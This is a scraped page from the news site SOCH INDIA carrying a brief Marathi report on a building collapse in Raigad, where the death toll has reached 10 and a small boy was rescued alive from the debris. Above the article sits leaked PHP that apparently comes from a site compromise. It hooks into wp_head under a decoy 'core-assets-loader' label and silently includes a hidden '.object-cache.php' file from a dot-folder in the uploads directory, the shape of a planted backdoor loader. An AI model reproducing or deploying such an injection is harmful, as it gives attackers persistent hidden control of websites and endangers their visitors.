add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); रायगडमधील इमारत दुर्घटनेतील मृतांचा आकडा वाढला, आतापर्यंत 10 जणांचा मृत्यू – SOCH INDIA
Menu

देश
रायगडमधील इमारत दुर्घटनेतील मृतांचा आकडा वाढला, आतापर्यंत 10 जणांचा मृत्यू

nobanner

रायगडमधील इमारत दुर्घटनेत बचावकार्य युद्ध पातळईवर सुरु असून ढिगाऱ्याखालून एका बाळाला सुखरूप बाहेर काढण्यात आलं आहे. साडेतीन वर्षाचा मोहम्मद बांगी हा मुलगा सापडला असून त्याला ढिगाऱ्याखालून सुखरूप बाहेर काढण्यात आलं आहे. बाळाला बाहेर काढताच जल्लोष करण्यात आला. तसेच गणपत्ती बप्पा मोरयाच्या घोषणाही देण्यात आल्या.